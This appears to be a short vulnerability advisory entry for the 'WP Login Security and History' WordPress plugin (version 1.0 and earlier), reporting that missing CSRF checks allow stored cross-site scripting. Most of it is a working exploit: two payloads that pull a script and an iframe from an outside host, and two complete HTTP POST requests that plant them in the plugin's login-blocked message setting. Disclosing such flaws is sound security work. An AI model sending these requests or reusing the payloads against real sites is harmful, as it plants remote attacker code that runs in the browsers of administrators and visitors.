WP Login Security and History <= 1.0 - CSRF to Stored Cross-Site Scripting (XSS)

2021-04-1200:00:00

m0ze

0.002 Low

EPSS

Percentile

64.6%

JSON

The plugin did not have CSRF check when saving its settings, not any sanitisation or validation on them. This could allow attackers to make logged in administrators change the plugin’s settings to arbitrary values, and set XSS payloads on them as well

### -- [ Payloads: ]

[$] "><script src=https://m0ze.ru/payload/a.js></script>

[$] "><iframe src=https://m0ze.ru/payload/xfsii.html></iframe>


### -- [ PoC #1 | Authenticated Persistent XSS & XFS | Blocker page message: ]

[!] POST /wp-admin/options-general.php?page=wp_login_security_and_history.php&page_num=%22+onmouseover%3Dalert%28%29+1&tab=2 HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 252
Cookie: [admin cookies]

can_show_captcha_option=1&show_captcha_count_option=1337&can_block_login_trials=1&login_max_trials=1337&login_block_time=13&login_blocked_msg=%22%3E%3Cscript+src%3Dhttps%3A%2F%2Fm0ze.ru%2Fpayload%2Fa.js%3E%3C%2Fscript%3E&Save_Options=++Update+Options++



### -- [ PoC #2 | Authenticated Persistent XSS & XFS | Blocker page message: ]

[!] POST /wp-admin/options-general.php?page=wp_login_security_and_history.php&page_num=%22+onmouseover%3Dalert%28%29+1&tab=2 HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 258
Cookie: [admin cookies]

can_show_captcha_option=1&show_captcha_count_option=1337&can_block_login_trials=1&login_max_trials=1337&login_block_time=13&login_blocked_msg=%22%3E%3Ciframe+src%3Dhttps%3A%2F%2Fm0ze.ru%2Fpayload%2Fxfsii.html%3E%3C%2Fiframe%3E&Save_Options=++Update+Options++